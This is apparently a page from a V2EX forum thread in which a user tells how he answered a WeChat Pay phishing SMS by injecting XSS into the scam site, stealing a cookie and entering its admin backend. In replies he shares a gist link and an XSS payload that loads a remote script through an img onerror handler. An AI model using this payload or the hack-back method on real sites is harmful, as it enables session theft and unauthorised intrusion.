腾讯内部是不是有内鬼啊，刚刚申请了微信支付，结果就发来诈骗短信

2016-12-20 13:54:12 +08:00

TangMonk

昨天在微信官网上申请微信支付，今天下午就收到了一条短信

于是我就点开了这个链接，发现是 asp 后缀的，腾讯应该搞 php 的啊，我于是就发现有点不对头，我就往里面来了一发 xss 代码。

不一会儿就搞到了 cookie, 登录后台一看。。

17224 次点击

所在节点

微信

106 条回复

Ouyangan

2016-12-21 09:36:19 +08:00

@jookr 对输入的字符中的特殊字符进行转义 . 配置统一的过滤层 .

sola97

2016-12-21 09:44:32 +08:00

有没有 xss 代码供学习一下

tairan2006

2016-12-21 10:10:55 +08:00

楼主好样的，佩服

hoythan

2016-12-21 10:17:16 +08:00

能不能提供一下你的 xss 代码学习一下.

mazyi

2016-12-21 10:25:30 +08:00

厉害啊厉害，随手注入了一下~

TangMonk

2016-12-21 10:27:00 +08:00

@hoythan
@sola97

https://gist.github.com/TangMonk/aa7463f6ebb2c88e607ee12407b34446

TangMonk

2016-12-21 10:32:24 +08:00

@TangMonk 这个 xss 代码也是我抄别人的。。 :(

BakCshi

2016-12-21 10:32:25 +08:00

去知乎发个帖，搞个大新闻

nevermlnd

2016-12-21 10:36:57 +08:00

如果是 iPhone 的截图回更有说服力

ljcarsenal

2016-12-21 11:17:29 +08:00

@TangMonk 你这个代码直接通过用户名输入框输入进去的？服务端和网页限制一下输入长度是不是就没用了

TangMonk

2016-12-21 11:28:39 +08:00

@ljcarsenal 不是，这只是一个 js 链接包含的内容而已，输入框里面填写

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的 js 地址';>

wavingclear

2016-12-21 12:15:57 +08:00

应该是伪基站，想骗普通吃瓜群众，骗到程序员是因为他倒霉

sutking

2016-12-21 12:21:36 +08:00

第一眼就发现域名有问题啊

sutking

2016-12-21 12:24:05 +08:00

你看这 whois ，绝对坑你没商量

yamen

2016-12-21 13:12:01 +08:00

我不懂，但我觉得你用的是安卓吧？

fengjianxinghun

2016-12-21 13:15:28 +08:00

nice ！干得不错

choury

2016-12-21 13:22:45 +08:00

这个是针对个人的微信支付来诈骗的吧，任何人收到都可能受骗啊，基本有微信的都开了微信支付吧，只是你收到短信的时间比较巧吧

zhangsimon

2016-12-21 13:37:33 +08:00

你的手机什么 rom ！！！太干扰人了

TangMonk

2016-12-21 13:42:23 +08:00

@zhangsimon 一加 2 。。氢 os

samtoto

2016-12-21 13:50:12 +08:00

next page>

第 5 页／共 6 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/328864

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.